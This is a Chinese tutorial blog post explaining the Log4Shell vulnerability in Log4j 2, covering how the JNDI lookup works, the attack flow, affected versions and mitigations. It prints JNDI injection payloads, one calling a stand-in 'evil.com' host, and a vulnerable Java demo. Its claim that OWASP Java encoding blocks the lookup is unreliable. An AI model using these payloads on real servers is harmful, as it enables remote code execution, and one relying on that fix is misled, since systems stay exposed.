重新理解 Log4Shell 漏洞（CVE-2021-44228）：零基础到精通，收藏！

原创于 2025-10-22 18:45:00 发布 · 952 阅读

29 ·

CC 4.0 BY-SA版权

文章标签：

#web安全 #网络 #安全

网络安全同时被 3 个专栏收录

1229 篇文章

订阅专栏

干货分享

383 篇文章

订阅专栏

程序员

372 篇文章

订阅专栏

Log4Shell，又名CVE-2021-44228，是Apache Log4j 2日志库中的一个严重漏洞，它允许攻击者远程执行代码，完全控制你的服务器。形象地说，如果你的服务器是一个家，Log4j是记录访客信息的管家，而Log4Shell漏洞就像是管家被人收买，把坏人直接领进门，让坏人可以在你家里为所欲为。

漏洞核心：JNDI 查找

Log4j 有一个叫做 _JNDI 查找_的功能，这本来是为了方便程序员在日志里引用外部数据。简单来说，就是Log4j在记录日志的时候，会解析一些特殊格式的字符串，并根据字符串的内容去外部服务器上获取数据。

问题就出在这里，如果攻击者构造一个恶意的字符串，比如${jndi:ldap://evil.com/payload}，Log4j 就会尝试去 evil.com 这台服务器上下载并执行 payload （恶意代码）。

影响范围

由于Log4j被广泛用于Java应用程序，所以这个漏洞影响了几乎所有使用Java的互联网服务。你可以把它想象成水龙头，几乎每家每户都有，一旦水龙头出了问题，影响的是千家万户。

如何理解 JNDI？

JNDI (Java Naming and Directory Interface) 可以理解为一个 电话号码簿。应用程序可以通过名字 (例如 “数据库连接”) 在 JNDI 中查找到对应的资源 (例如数据库连接信息)。

正常情况下，电话号码簿是安全可靠的，但 Log4Shell 漏洞允许攻击者 篡改电话号码簿，将 “数据库连接” 指向一个恶意的地址，从而让应用程序连接到攻击者的服务器并执行恶意代码。

漏洞利用流程：

攻击者发送包含恶意 JNDI 字符串的请求到你的服务器（例如，通过网页表单、HTTP 头）。
你的 Java 应用程序使用 Log4j 记录包含该恶意字符串的日志。
Log4j 解析该字符串，触发 JNDI 查找，连接到攻击者的服务器。
攻击者的服务器返回恶意 Java 代码。
Log4j 加载并执行该恶意代码，攻击者获得服务器控制权。

实际案例与攻击场景

游戏服务器: 攻击者可以在游戏聊天信息中发送恶意字符串，控制游戏服务器，导致游戏崩溃或盗取玩家信息。
电商网站: 攻击者可以在商品评论或用户注册信息中注入恶意字符串，控制电商网站服务器，窃取用户支付信息或篡改商品价格。
企业应用: 攻击者可以通过电子邮件、OA 系统等渠道发送恶意字符串，控制企业内部服务器，窃取商业机密或进行勒索攻击。

受影响的版本

Log4j 2.0-beta9 到 2.14.1 版本的都受此漏洞影响。

修复方案

升级 Log4j 版本: 这是最有效的解决方案。升级到 Log4j 2.17.0 或更高版本。
临时缓解措施 (如果无法立即升级):
- 移除 JndiLookup 类: 在 log4j-core*.jar 文件中删除 org/apache/logging/log4j/core/lookup/JndiLookup.class 文件。
- 设置系统属性: 添加 JVM 参数 -Dlog4j2.formatMsgNoLookups=true。

代码演示（模拟攻击与防御）

以下代码仅为演示，请勿用于非法用途。

// 模拟存在漏洞的代码
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class VulnerableApp {
    private static final Logger logger = LogManager.getLogger(VulnerableApp.class);

    public static void main(String[] args) {
        String userInput = "${jndi:ldap://127.0.0.1:1389/Exploit}"; // 恶意 JNDI 字符串
        logger.error("User input: {}", userInput); // 记录日志，触发漏洞
    }
}

这段代码会尝试连接到 ldap://127.0.0.1:1389/Exploit，如果攻击者在该地址部署了恶意服务，就会执行恶意代码。

防御方法一：设置系统属性

在运行上述代码前，添加 JVM 参数 -Dlog4j2.formatMsgNoLookups=true，可以禁用 JNDI 查找，从而防御该漏洞。

防御方法二：代码层面防御

永远不要信任用户的输入，对所有输入数据进行严格的校验和过滤，避免恶意字符串进入日志。

// 安全的代码示例
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.owasp.encoder.Encode; // 引入 OWASP Encoder

public class SecureApp {
    private static final Logger logger = LogManager.getLogger(SecureApp.class);

    public static void main(String[] args) {
        String userInput = "${jndi:ldap://127.0.0.1:1389/Exploit}"; // 恶意 JNDI 字符串
        String safeInput = Encode.forJava(userInput); // 使用 OWASP Encoder 进行转义
        logger.error("User input: {}", safeInput); // 记录转义后的日志
    }
}

在这个例子中，我们使用了 OWASP Encoder 库对用户输入进行了转义，将恶意字符转换成安全字符，从而避免了漏洞的触发。

数值指标与量化分析